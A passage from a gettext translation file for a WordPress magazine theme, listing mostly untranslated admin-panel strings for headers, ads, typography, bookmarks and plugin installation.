backend/panels/design.php:378 msgid "G3 - 615x410" msgstr "" #: backend/single-metaboxes.php:418 msgid "Gallery Format" msgstr "" #: backend/panels/design.php:484 msgid "Gallery Icon" msgstr "" #: backend/panels/design.php:507 msgid "Gallery Icon Color" msgstr "" #: backend/panels/single-post.php:132 backend/single-metaboxes.php:424 msgid "Gallery Layout" msgstr "" #: backend/panels/single-post.php:126 msgid "Gallery Post Format Layout" msgstr "" #: backend/panels/amp.php:40 backend/panels/bookmark.php:28 #: backend/panels/general.php:10 backend/panels/header.php:31 #: backend/panels/single-post.php:1590 msgid "General" msgstr "" #: backend/panels/design.php:303 backend/panels/header-style.php:24 #: backend/panels/header-style.php:318 backend/panels/header-style.php:569 #: backend/panels/page.php:24 backend/single-metaboxes.php:51 msgid "General Settings" msgstr "" #: backend/panels/general.php:11 msgid "General settings for your website." msgstr "" #: backend/panels/design.php:647 msgid "GIF Supported" msgstr "" #: backend/category-settings.php:150 backend/panels/blog-pages.php:148 #: backend/panels/blog-pages.php:685 backend/panels/blog-pages.php:1101 #: backend/panels/blog-pages.php:1509 backend/panels/blog-pages.php:2002 msgid "Global Blog Template Builder" msgstr "" #: backend/panels/color.php:15 msgid "Global Colors" msgstr "" #: backend/panels/header.php:50 msgid "Global Header Style" msgstr "" #: backend/panels/header.php:59 msgid "Global Header Template Shortcode" msgstr "" #: backend/panels/heading.php:35 msgid "Global Heading" msgstr "" #: backend/panels/heading.php:40 msgid "Global Heading Layout" msgstr "" #: backend/panels/color.php:28 msgid "Global Highlight Color" msgstr "" #: backend/panels/general.php:34 msgid "Global Search Placeholder" msgstr "" #: backend/panels/breadcrumb.php:23 msgid "Global Setting" msgstr "" #: backend/panels/sidebar.php:26 msgid "Global Sidebar Position" msgstr "" #: backend/panels/header.php:40 msgid "Global Site Header" msgstr "" #: backend/category-settings.php:155 backend/panels/blog-pages.php:153 #: backend/panels/blog-pages.php:691 backend/panels/blog-pages.php:1106 #: backend/panels/blog-pages.php:1515 backend/panels/blog-pages.php:2007 msgid "Global WP Query Template Shortcode" msgstr "" #: templates/single/review-comment.php:91 msgid "Good" msgstr "" #: templates/single/reviews.php:175 msgid "Good Stuff" msgstr "" #: backend/panels/block-grid.php:27 backend/panels/block-grid.php:192 msgid "grid" msgstr "" #: backend/panels/single-post.php:1340 msgid "Grid 1 (3 Columns)" msgstr "" #: backend/category-settings.php:244 backend/configs.php:451 #: backend/panels/block-grid.php:17 msgid "Grid 1 (Standard)" msgstr "" #: backend/category-settings.php:245 backend/configs.php:455 #: backend/panels/block-grid.php:182 msgid "Grid 2" msgstr "" #: backend/panels/bookmark.php:54 msgid "Guest and Logged Users" msgstr "" #: backend/panels/bookmark.php:71 msgid "Guest Bookmark Expiration" msgstr "" #: backend/configs.php:237 msgid "H1" msgstr "" #: backend/panels/typography.php:129 msgid "H1 Font" msgstr "" #: backend/panels/typography.php:121 msgid "H1 Tag" msgstr "" #: backend/configs.php:238 backend/panels/single-post.php:532 #: backend/single-metaboxes.php:224 msgid "H2" msgstr "" #: backend/panels/typography.php:178 msgid "H2 Font" msgstr "" #: backend/panels/typography.php:170 msgid "H2 Tag" msgstr "" #: backend/configs.php:239 backend/panels/single-post.php:533 #: backend/single-metaboxes.php:225 msgid "H3" msgstr "" #: backend/panels/typography.php:227 msgid "H3 Font" msgstr "" #: backend/panels/typography.php:219 msgid "H3 Tag" msgstr "" #: backend/configs.php:240 backend/panels/single-post.php:534 #: backend/single-metaboxes.php:226 msgid "H4" msgstr "" #: backend/panels/typography.php:276 msgid "H4 Font" msgstr "" #: backend/panels/typography.php:268 msgid "H4 Tag" msgstr "" #: backend/configs.php:241 backend/panels/single-post.php:535 #: backend/single-metaboxes.php:227 msgid "H5" msgstr "" #: backend/panels/typography.php:325 msgid "H5 Font" msgstr "" #: backend/panels/typography.php:317 msgid "H5 Tag" msgstr "" #: backend/configs.php:242 backend/panels/single-post.php:536 #: backend/single-metaboxes.php:228 msgid "H6" msgstr "" #: backend/panels/typography.php:374 msgid "H6 Font" msgstr "" #: backend/panels/typography.php:366 msgid "H6 Tag" msgstr "" #: backend/configs.php:844 msgid "Half banner (234x60)" msgstr "" #: backend/configs.php:854 msgid "Half Page (300x600)" msgstr "" #: backend/panels/table-contents.php:115 backend/single-metaboxes.php:728 msgid "Half Width" msgstr "" #: backend/panels/reaction.php:44 msgid "Happy" msgstr "" #: templates/header/templates.php:615 msgid "Have an existing account?" msgstr "" #: backend/panels/header.php:16 msgid "Header" msgstr "" #: backend/panels/amp.php:300 msgid "Header - Ad Type" msgstr "" #: backend/panels/amp.php:328 msgid "Header - Adsense Size" msgstr "" #: backend/panels/amp.php:340 msgid "Header - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:312 msgid "Header - Data Ad Client" msgstr "" #: backend/panels/amp.php:320 msgid "Header - Data Ad Slot" msgstr "" #: backend/panels/amp.php:294 msgid "Header Ad Settings" msgstr "" #: includes/sidebars.php:79 msgid "Header Advertising" msgstr "" #: backend/single-metaboxes.php:153 backend/single-metaboxes.php:930 msgid "Header Alert Bar" msgstr "" #: backend/panels/blog-pages.php:1968 backend/panels/header.php:408 #: backend/panels/header.php:462 msgid "Header Background" msgstr "" #: backend/category-settings.php:92 backend/panels/blog-pages.php:90 #: backend/panels/blog-pages.php:1084 backend/panels/blog-pages.php:1492 msgid "Header Background Style" msgstr "" #: backend/panels/header-style.php:80 msgid "Header Height" msgstr "" #: backend/panels/blog-pages.php:2390 msgid "Header Image" msgstr "" #: backend/panels/typography.php:893 msgid "Header Menus" msgstr "" #: backend/panels/header.php:738 msgid "Header Mini Cart" msgstr "" #: backend/panels/header.php:173 msgid "Header Search" msgstr "" #: backend/panels/header.php:195 msgid "Header Search Icon" msgstr "" #: backend/category-settings.php:56 backend/panels/blog-pages.php:37 #: backend/panels/blog-pages.php:603 backend/panels/blog-pages.php:1921 #: backend/panels/single-post.php:1555 backend/single-metaboxes.php:890 msgid "Header Style" msgstr "" #: backend/panels/header-style.php:15 msgid "Header Style 1,2,3" msgstr "" #: backend/panels/header-style.php:309 msgid "Header Style 4" msgstr "" #: backend/panels/header-style.php:560 msgid "Header Style 5" msgstr "" #: backend/category-settings.php:64 backend/panels/blog-pages.php:60 #: backend/panels/blog-pages.php:626 backend/panels/blog-pages.php:1944 #: backend/panels/woocommerce.php:60 backend/single-metaboxes.php:121 #: backend/single-metaboxes.php:898 msgid "Header Template Shortcode" msgstr "" #: backend/panels/header-style.php:56 backend/panels/header-style.php:350 #: backend/panels/header-style.php:601 msgid "Header Width" msgstr "" #: backend/category-settings.php:182 backend/panels/blog-pages.php:204 #: backend/panels/blog-pages.php:2404 msgid "Heading" msgstr "" #: backend/panels/bookmark.php:133 backend/panels/bookmark.php:483 msgid "Heading background Style" msgstr "" #: backend/panels/heading.php:129 msgid "Heading Color" msgstr "" #: backend/panels/heading.php:15 msgid "Heading Design" msgstr "" #: backend/panels/typography.php:1038 msgid "Heading Font" msgstr "" #: backend/category-settings.php:205 backend/panels/blog-pages.php:227 #: backend/panels/bookmark.php:540 backend/panels/single-post.php:1327 msgid "Heading Font Size (Desktop)" msgstr "" #: backend/category-settings.php:197 backend/panels/blog-pages.php:219 #: backend/panels/bookmark.php:532 backend/panels/single-post.php:1319 msgid "Heading HTML Tag" msgstr "" #: backend/category-settings.php:189 backend/panels/blog-pages.php:211 #: backend/panels/bookmark.php:524 backend/panels/single-post.php:1311 msgid "Heading Layout" msgstr "" #: backend/panels/table-contents.php:50 msgid "Heading Tag Supported" msgstr "" #: backend/panels/typography.php:1039 msgid "" "Heading tag will use default H tag font settings. Select font values if you " "would like to choose a custom font." msgstr "" #: backend/single-metaboxes.php:750 msgid "Headings Table" msgstr "" #: templates/header/templates.php:289 msgid "Hi," msgstr "Olá," #: backend/panels/single-post.php:1442 msgid "" "Hide a part of content of next posts and show the button to increase page " "views." msgstr "" #: backend/panels/single-post.php:402 msgid "Hide Next/Prev Post pagination on the mobile device." msgstr "" #: backend/configs.php:861 msgid "Hide on Desktop" msgstr "" #: backend/panels/single-post.php:1465 msgid "Hide Sidebar on Mobile" msgstr "" #: backend/category-settings.php:466 backend/panels/block-classic.php:130 #: backend/panels/block-grid.php:130 backend/panels/block-grid.php:295 #: backend/panels/block-grid.php:460 backend/panels/block-grid.php:633 #: backend/panels/block-grid.php:820 backend/panels/block-list.php:138 #: backend/panels/block-list.php:311 backend/panels/block-list.php:492 #: backend/panels/block-list.php:687 backend/panels/blog-pages.php:491 #: backend/panels/blog-pages.php:978 backend/panels/blog-pages.php:1392 #: backend/panels/blog-pages.php:1800 backend/panels/blog-pages.php:2292 #: backend/panels/bookmark.php:390 backend/panels/bookmark.php:838 msgid "Hide the entry category on the tablet and mobile devices." msgstr "" #: backend/category-settings.php:496 backend/panels/block-classic.php:156 #: backend/panels/block-grid.php:156 backend/panels/block-grid.php:321 #: backend/panels/block-grid.php:486 backend/panels/block-grid.php:659 #: backend/panels/block-grid.php:846 backend/panels/block-list.php:164 #: backend/panels/block-list.php:337 backend/panels/block-list.php:518 #: backend/panels/block-list.php:713 backend/panels/blog-pages.php:521 #: backend/panels/blog-pages.php:1008 backend/panels/blog-pages.php:1422 #: backend/panels/blog-pages.php:1830 backend/panels/blog-pages.php:2322 #: backend/panels/bookmark.php:412 backend/panels/bookmark.php:868 msgid "Hide the post excerpt on the tablet and mobile devices." msgstr "" #: backend/panels/single-post.php:1466 msgid "Hide the post sidebar on the mobile device when load next posts." msgstr "" #: backend/panels/header.php:712 msgid "Hide this bar on the sticky navigation." msgstr "" #: backend/panels/header.php:711 msgid "Hide when Sticky" msgstr "" #: backend/mega-menu.php:142 msgid "Hierarchical" msgstr "" #: backend/category-settings.php:30 backend/panels/design.php:44 msgid "Highlight Color" msgstr "" #: backend/panels/color.php:23 msgid "Highlight Colors" msgstr "" #: backend/panels/single-post.php:544 msgid "Highlight Heading" msgstr "" #: backend/single-metaboxes.php:212 msgid "Highlight Point" msgstr "" #: backend/panels/single-post.php:1490 backend/panels/single-post.php:1499 msgid "Highlight Shares" msgstr "" #: backend/panels/single-post.php:546 msgid "Highlights" msgstr "" #: backend/panels/optimized.php:181 msgid "Home Description" msgstr "" #: backend/panels/header-style.php:140 backend/panels/header-style.php:218 #: backend/panels/header-style.php:284 backend/panels/header-style.php:428 #: backend/panels/header-style.php:507 backend/panels/header-style.php:695 #: backend/panels/header-style.php:773 msgid "Hover Accent Color" msgstr "" #: backend/panels/design.php:567 msgid "Hover Effects" msgstr "" #: backend/panels/header-style.php:132 backend/panels/header-style.php:210 #: backend/panels/header-style.php:276 backend/panels/header-style.php:420 #: backend/panels/header-style.php:499 backend/panels/header-style.php:687 #: backend/panels/header-style.php:765 msgid "Hover Text Color" msgstr "" #: backend/panels/single-post.php:529 msgid "HTML Tag" msgstr "" #: backend/panels/design.php:180 msgid "Human Time Format" msgstr "" #: backend/panels/single-post.php:218 msgid "Hyperlink Color" msgstr "" #: backend/panels/single-post.php:200 msgid "Hyperlink Settings" msgstr "" #: backend/panels/single-post.php:205 msgid "Hyperlink Style" msgstr "" #: backend/panels/single-post.php:234 msgid "Hyperlink Underline" msgstr "" #: backend/panels/header.php:550 msgid "Icon" msgstr "" #: backend/mega-menu.php:238 msgid "Icon Classname" msgstr "" #: backend/panels/ads.php:39 msgid "" "If you use auto ads code, you need to disable any other adsense units code." msgstr "" #: backend/panels/design.php:246 msgid "" "If you use font Awesome. ensure that the setting in \"Theme Design > Font " "Awesome\" is enabled." msgstr "" #: backend/single-metaboxes.php:344 backend/single-metaboxes.php:392 msgid "Iframe Embed Code" msgstr "" #: backend/panels/dark-mode.php:35 msgid "Image Opacity" msgstr "" #: backend/panels/typography.php:488 msgid "Important Meta Font" msgstr "" #: backend/panels/header-style.php:89 backend/panels/header-style.php:377 #: backend/panels/header-style.php:644 msgid "" "In case you would like to switch layout and text to light when set a dark " "background for sub menu in light mode." msgstr "" #: backend/panels/single-post.php:1374 msgid "Infinite Scroll" msgstr "" #: backend/configs.php:563 backend/panels/bookmark.php:575 msgid "Infinite Scroll (Ajax)" msgstr "" #: backend/panels/amp.php:541 msgid "Inline - Ad Type" msgstr "" #: backend/panels/amp.php:569 msgid "Inline - Adsense Size" msgstr "" #: backend/panels/amp.php:581 msgid "Inline - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:553 msgid "Inline - Data Ad Client" msgstr "" #: backend/panels/amp.php:561 msgid "Inline - Data Ad Slot" msgstr "" #: backend/panels/single-post.php:1259 msgid "Inline Content Related Box" msgstr "" #: backend/panels/ads.php:265 msgid "Inline Single Content" msgstr "" #: backend/panels/amp.php:535 msgid "Inline Single Content Ad Settings" msgstr "" #: backend/panels/typography.php:593 msgid "Input & Textarea Font" msgstr "" #: backend/panels/blog-pages.php:154 backend/panels/blog-pages.php:1107 #: backend/panels/blog-pages.php:1516 backend/panels/blog-pages.php:2008 msgid "" "Input a \"Ruby Template\" shortcode to display as the main blog posts, ie: " "[Ruby_E_Template id=\"1\"]." msgstr "" #: backend/panels/blog-pages.php:120 msgid "" "Input a \"Ruby Template\" shortcode to embed it after the category header, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/category-settings.php:130 msgid "" "Input a \"Ruby Template\" shortcode to embed it after this category header, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:659 msgid "" "Input a \"Ruby Template\" shortcode to embed it the bottom of the blog page, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:650 msgid "" "Input a \"Ruby Template\" shortcode to embed it the top of the blog page, ie:" " [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/category-settings.php:156 msgid "" "Input a \"Ruby Template\" shortcode to show it as a the main blog listing " "for this category." msgstr "" #: backend/panels/blog-pages.php:692 msgid "" "Input a \"Ruby Template\" shortcode to show it as a the main blog listing." msgstr "" #: backend/panels/design.php:330 msgid "Input a custom crop size: width x height. For example: 300x200" msgstr "" #: backend/panels/single-post.php:498 msgid "Input a custom font size value (in px) for the single entry category." msgstr "" #: backend/panels/blog-pages.php:228 msgid "" "Input a custom font size value for the category heading (px) on the desktop." msgstr "" #: backend/category-settings.php:206 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave " "this option blank to set the default value." msgstr "" #: backend/panels/bookmark.php:541 backend/panels/single-post.php:1328 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave " "this option blank to set the default." msgstr "" #: backend/panels/header.php:603 msgid "Input a custom forget password URL if have." msgstr "" #: backend/panels/single-post.php:1754 msgid "" "Input a custom height value (px) for this bar. Leave blank to set it as the " "default." msgstr "" #: backend/panels/header.php:354 msgid "Input a custom height value for the mobile navigation, Default is 40px." msgstr "" #: backend/panels/header.php:596 msgid "Input a custom register URL if have." msgstr "" #: backend/panels/design.php:686 msgid "Input a custom round corner (in px) for your website." msgstr "" #: backend/panels/design.php:436 msgid "" "Input a custom time value to next a slide in milliseconds (default is 5000)." msgstr "" #: backend/panels/ads.php:495 msgid "" "Input a delay time (ms) value to show the slide up after the site loaded." msgstr "" #: backend/panels/adblock.php:34 msgid "Input a description for the adblock popup." msgstr "" #: backend/panels/ads.php:410 msgid "Input a description for the adverting box." msgstr "" #: backend/panels/header.php:566 msgid "" "Input a description for the login form. Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:278 msgid "Input a destination URL for the notification panel." msgstr "" #: backend/panels/footer.php:208 msgid "Input a font size value (in px) for the copy right text." msgstr "" #: backend/panels/footer.php:114 msgid "" "Input a font size value (in px) for the default menu widgets are displaying " "in the footer." msgstr "" #: backend/panels/footer.php:214 msgid "Input a font size value (in px) for the footer copyright menu." msgstr "" #: backend/panels/newsletter.php:56 msgid "Input a footer text for the box." msgstr "" #: backend/panels/header.php:188 msgid "Input a heading for displaying above the search form." msgstr "" #: backend/panels/blog-pages.php:2405 msgid "" "Input a heading for the 404 page. Leave this option blank to set it as the " "default." msgstr "" #: backend/panels/single-post.php:545 msgid "Input a heading for the highlights section if it is existing." msgstr "" #: backend/panels/header.php:559 msgid "Input a heading for the login form." msgstr "" #: backend/panels/blog-pages.php:205 msgid "" "Input a heading for the post listing. Leave blank to disable this section" msgstr "" #: backend/category-settings.php:183 msgid "" "Input a heading for the post listing. Leave this option blank to set the " "default." msgstr "" #: backend/panels/bookmark.php:105 backend/panels/bookmark.php:448 #: backend/panels/bookmark.php:519 msgid "Input a heading for this section." msgstr "" #: backend/panels/single-post.php:1305 msgid "Input a heading for this section. Leave -1 to disable this heading." msgstr "" #: backend/panels/amp.php:98 backend/panels/footer.php:159 msgid "Input a height for value for the footer logo, Default is 50px." msgstr "" #: backend/panels/header-style.php:369 backend/panels/header-style.php:636 msgid "Input a max height value for the logo of this header. Default is 60." msgstr "" #: backend/panels/ads.php:201 backend/panels/ads.php:390 msgid "" "Input a max width value (in px) for your ad image, leave blank set full size." msgstr "" #: backend/panels/single-post.php:1133 msgid "Input a meta text for the sponsored posts." msgstr "" #: backend/panels/table-contents.php:126 msgid "" "Input a minimum value for total heading tags to show the table of contents " "box." msgstr "" #: backend/panels/newsletter.php:49 msgid "Input a newsletter shortcode." msgstr "" #: backend/single-metaboxes.php:581 msgid "Input a offer label (Call to action) for this product review." msgstr "" #: backend/panels/single-post.php:1276 msgid "Input a position (after x paragraphs) to display the related bõ." msgstr "" #: backend/panels/table-contents.php:142 msgid "" "Input a position (after x paragraphs) to display the table of contents box." msgstr "" #: backend/single-metaboxes.php:737 msgid "" "Input a position (after x paragraphs) to display the table of contents box. " "Leave blank to use the theme option setting, Set \"-1\" for displaying at " "the top." msgstr "" #: backend/panels/ads.php:429 backend/panels/amp.php:589 msgid "Input a position (after x paragraphs) to display your ads." msgstr "" #: backend/panels/header.php:589 msgid "Input a redirect URL when the user logged in." msgstr "" #: backend/panels/single-post.php:1267 msgid "Input a related shortcode you want to display." msgstr "" #: backend/single-metaboxes.php:173 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for " "this page, Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:950 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for " "this post, Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/panels/blog-pages.php:627 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "blog page." msgstr "" #: backend/panels/blog-pages.php:61 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "category pages." msgstr "" #: backend/panels/blog-pages.php:1945 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "search page." msgstr "" #: backend/category-settings.php:65 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this category. Leave blank to use the above setting." msgstr "" #: backend/single-metaboxes.php:122 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this page. Leave this option blank to set as the above setting." msgstr "" #: backend/single-metaboxes.php:899 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this page. This setting requests to select \"Use Ruby Template\" in site " "header setting in order to work." msgstr "" #: backend/panels/header.php:60 msgid "Input a Ruby Template shortcode for displaying as the website header." msgstr "" #: backend/single-metaboxes.php:541 msgid "" "Input a short description to display before the review score, For example: " "Good, Bad..." msgstr "" #: backend/single-metaboxes.php:668 msgid "" "Input a starting view value for this post. Leave blank if you want to " "display real data." msgstr "" #: backend/single-metaboxes.php:199 msgid "" "Input a tagline for this post, It will display under the single post title." msgstr "" #: backend/panels/ads.php:470 msgid "" "Input a template shortcode or any other shortcode you would like to show in " "this section." msgstr "" #: backend/panels/adblock.php:27 msgid "Input a title for the adblock popup." msgstr "" #: backend/panels/reaction.php:32 msgid "" "Input a title for the reaction section. Leave blank to set it as the default." msgstr "" #: backend/single-metaboxes.php:497 msgid "Input a title for this review section." msgstr "" #: backend/panels/design.php:69 msgid "" "Input a value to limited numbers of entry category show on all post listing " "layout, useful in case you have many categories per post." msgstr "" #: backend/mega-menu.php:205 msgid "" "Input a width value (in px) for this mega section. Leave blank or 0 to set " "to full width." msgstr "" #: backend/panels/header.php:142 msgid "" "Input a width value (in px) for this section. Leave blank to set a the " "default." msgstr "" #: backend/single-metaboxes.php:547 msgid "Input advantages for this review." msgstr "" #: backend/mega-menu.php:243 msgid "Input attachment image/SVG url to show your icon." msgstr "" #: backend/single-metaboxes.php:259 msgid "Input attribution for the featured image." msgstr "" #: backend/single-metaboxes.php:252 msgid "Input caption text for the featured image." msgstr "" #: backend/panels/header-style.php:629 msgid "" "Input custom height value (px) for the navigation bar of this header. " "Default is 40px." msgstr "" #: backend/panels/header-style.php:362 msgid "Input custom height value (px) for the navigation bar. Default is 40." msgstr "" #: backend/panels/header-style.php:81 msgid "Input custom height value (px) for this header. Default is 60." msgstr "" #: backend/category-settings.php:337 backend/panels/blog-pages.php:359 #: backend/panels/blog-pages.php:846 backend/panels/blog-pages.php:1260 #: backend/panels/blog-pages.php:1668 backend/panels/blog-pages.php:2160 #: backend/panels/bookmark.php:259 backend/panels/bookmark.php:707 msgid "" "Input custom ratio percent (height*100/width) for featured image you would " "like. For example: 50" msgstr "" #: backend/panels/general.php:35 msgid "" "Input default placeholder text for the search form, leave blank to set it as " "the default." msgstr "" #: backend/panels/newsletter.php:42 msgid "Input description for the popup newsletter form" msgstr "" #: backend/panels/bookmark.php:112 backend/panels/bookmark.php:455 msgid "Input description for this section." msgstr "" #: backend/single-metaboxes.php:561 msgid "Input disadvantages for this review." msgstr "" #: backend/category-settings.php:488 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/panels/blog-pages.php:513 backend/panels/blog-pages.php:1000 #: backend/panels/blog-pages.php:1414 backend/panels/blog-pages.php:1822 #: backend/panels/blog-pages.php:2314 backend/panels/bookmark.php:860 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/category-settings.php:480 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/panels/blog-pages.php:505 backend/panels/blog-pages.php:992 #: backend/panels/blog-pages.php:1406 backend/panels/blog-pages.php:1814 #: backend/panels/blog-pages.php:2306 backend/panels/bookmark.php:852 #: backend/panels/single-post.php:609 backend/panels/single-post.php:618 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/category-settings.php:359 msgid "" "Input entry meta tags to show. Separated by commas (for example: author,date)" ". All meta keys include: [author, date, category, tag, view, comment, update," " read, custom]" msgstr "" #: backend/single-metaboxes.php:575 msgid "Input final summary for this review." msgstr "" #: backend/panels/typography.php:587 msgid "Input Font Settings" msgstr "" #: backend/single-metaboxes.php:757 msgid "Input Heading" msgstr "" #: backend/single-metaboxes.php:206 msgid "" "Input highlights for this post. This section will appear a the top of " "content. To edit this section heading, Navigate to Theme Options > Single " "Post > Tagline & highlights" msgstr "" #: backend/single-metaboxes.php:393 msgid "Input iframe embed code if WordPress cannot support your audio URL." msgstr "" #: backend/single-metaboxes.php:345 msgid "Input iframe embed code if WordPress cannot support your video URL." msgstr "" #: backend/panels/bookmark.php:72 msgid "" "Input max expiration (days) to save bookmarks for the guest users. Set 0 for " "no expiration." msgstr "" #: backend/panels/design.php:166 msgid "" "Input number of words per minute to calculate the reading time. Default is " "130" msgstr "" #: backend/single-metaboxes.php:599 msgid "Input the currency of the price." msgstr "" #: backend/panels/amp.php:313 backend/panels/amp.php:373 #: backend/panels/amp.php:433 backend/panels/amp.php:494 #: backend/panels/amp.php:554 msgid "Input the data-ad-client number ID (without ca-pub-)." msgstr "" #: backend/panels/amp.php:321 backend/panels/amp.php:381 #: backend/panels/amp.php:441 backend/panels/amp.php:502 #: backend/panels/amp.php:562 msgid "Input the data-ad-slot number ID." msgstr "" #: backend/single-metaboxes.php:587 msgid "Input the destination URL of the offer." msgstr "" #: backend/panels/bookmark.php:478 msgid "Input the follow page URL for user can redirect to add their interests." msgstr "" #: backend/panels/header.php:157 backend/panels/header.php:389 msgid "" "Input the footer copyright text to display at the bottom of this section, " "allow raw HTML." msgstr "" #: backend/single-metaboxes.php:751 msgid "" "Input the heading for each page corresponding to the page break tags. Please " "input all headings for pages to show the section." msgstr "" #: backend/panels/table-contents.php:133 msgid "Input the heading for the table of contents box." msgstr "" #: backend/panels/design.php:238 msgid "Input the label for this meta." msgstr "" #: backend/panels/socials.php:190 backend/panels/socials.php:217 #: backend/panels/socials.php:244 msgid "Input the name of font icon, for example: \"fab fa-facebook\"." msgstr "" #: backend/panels/socials.php:184 backend/panels/socials.php:211 #: backend/panels/socials.php:238 msgid "Input the name of the social, for example: facebook, twitter." msgstr "" #: backend/single-metaboxes.php:772 msgid "" "Input the post source if it has, it will display at the bottom of post " "content" msgstr "" #: backend/single-metaboxes.php:793 msgid "" "Input the post via if it has, it will display at the bottom of post content" msgstr "" #: backend/single-metaboxes.php:593 msgid "Input the price of the offer." msgstr "" #: backend/panels/design.php:544 msgid "" "Input the read more label to display on your website. Default is \"Read " "More\"." msgstr "" #: backend/panels/bookmark.php:64 msgid "" "Input the redirect URL when user logged. Leave this option blank to set the " "default value." msgstr "" #: backend/single-metaboxes.php:630 msgid "Input the sponsor brand name for this post" msgstr "" #: backend/single-metaboxes.php:623 msgid "Input the sponsor website URL." msgstr "" #: backend/panels/newsletter.php:35 msgid "Input title for the popup newsletter form" msgstr "" #: backend/single-metaboxes.php:290 msgid "" "Input value or text for the custom meta that you created in Theme Options " "panel." msgstr "" #: backend/panels/single-post.php:349 msgid "Input your a description for your newsletter." msgstr "" #: backend/panels/single-post.php:342 msgid "Input your a heading for your newsletter section." msgstr "" #: backend/panels/single-post.php:356 msgid "" "Input your a newsletter (subscribe) shortcode or script to show at bottom " "entry content." msgstr "" #: backend/panels/ads.php:194 backend/panels/ads.php:383 msgid "Input your ad destination URL." msgstr "" #: backend/panels/ads.php:123 msgid "Input your ad script code." msgstr "" #: backend/panels/header.php:667 msgid "Input your alert content to show." msgstr "" #: backend/panels/header.php:674 msgid "Input your alert URL." msgstr "" #: backend/panels/amp.php:262 msgid "Input your amp auto ads code." msgstr "" #: backend/panels/amp.php:341 backend/panels/amp.php:401 #: backend/panels/amp.php:461 backend/panels/amp.php:522 #: backend/panels/amp.php:582 msgid "Input your AMP custom ad script." msgstr "" #: backend/single-metaboxes.php:387 msgid "" "Input your audio URL, support: SoundCloud, MixCloud. Do not forget to check " "\"Audio\" in Post Format section." msgstr "" #: backend/panels/ads.php:50 msgid "Input your auto ads code." msgstr "" #: backend/panels/optimized.php:203 msgid "input your company city and country address." msgstr "" #: backend/panels/optimized.php:217 msgid "input your company local postal code." msgstr "" #: backend/panels/optimized.php:196 msgid "input your company main email." msgstr "" #: backend/panels/optimized.php:189 msgid "input your company phone number." msgstr "" #: backend/panels/optimized.php:210 msgid "input your company street address." msgstr "" #: backend/panels/footer.php:192 msgid "input your copyright text or HTML." msgstr "" #: backend/panels/ads.php:312 msgid "Input your custom ad script code or Adsense." msgstr "" #: backend/panels/design.php:245 msgid "" "Input your custom CSS icon classname to display at the beginning of the meta." msgstr "" #: backend/panels/blog-pages.php:2412 msgid "" "Input your description for the 404 page. Leave this option blank to set it " "as the default." msgstr "" #: backend/panels/optimized.php:245 msgid "input your facebook app ID for OG tags." msgstr "" #: backend/panels/single-post.php:363 msgid "Input your policy text for the newsletter form, row HTML allowed." msgstr "" #: backend/panels/privacy.php:34 msgid "Input your privacy or cookie content for your website, allow raw HTML." msgstr "" #: backend/panels/socials.php:29 backend/panels/socials.php:36 #: backend/panels/socials.php:43 backend/panels/socials.php:50 #: backend/panels/socials.php:56 backend/panels/socials.php:63 #: backend/panels/socials.php:69 backend/panels/socials.php:75 #: backend/panels/socials.php:81 backend/panels/socials.php:87 #: backend/panels/socials.php:93 backend/panels/socials.php:99 #: backend/panels/socials.php:105 backend/panels/socials.php:111 #: backend/panels/socials.php:117 backend/panels/socials.php:123 #: backend/panels/socials.php:129 backend/panels/socials.php:135 #: backend/panels/socials.php:141 backend/panels/socials.php:147 #: backend/panels/socials.php:153 msgid "Input your social profile URL, Leave blank if you want to disable it." msgstr "" #: backend/panels/socials.php:178 backend/panels/socials.php:205 #: backend/panels/socials.php:232 msgid "Input your social profile URL." msgstr "" #: backend/panels/woocommerce.php:61 msgid "" "Input your template shortcode you would like to use Elementor builder to " "create a featured section at the top of shop page." msgstr "" #: backend/panels/footer.php:122 msgid "Input your template shortcode you would like to use Elementor builder." msgstr "" #: backend/single-metaboxes.php:332 msgid "Input your video link, support: Youtube, Vimeo, DailyMotion." msgstr "" #: backend/panels/typography.php:578 msgid "Inputs & Button" msgstr "" #: templates/parts.php:603 msgid "Instagram" msgstr "" #: backend/panels/socials.php:49 msgid "Instagram URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2811 msgid "Install" msgstr "" #: backend/class-tgm-plugin-activation.php:2697 #, php-format msgid "Install %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:340 backend/install-plugins.php:67 msgid "Install Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:339 backend/install-plugins.php:66 msgid "Install Required Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:2413 msgid "Installed But Not Activated" msgstr "" #: backend/class-tgm-plugin-activation.php:2584 msgid "Installed version:" msgstr "" #: backend/class-tgm-plugin-activation.php:3606 #, php-format msgid "Installing and Activating Plugin 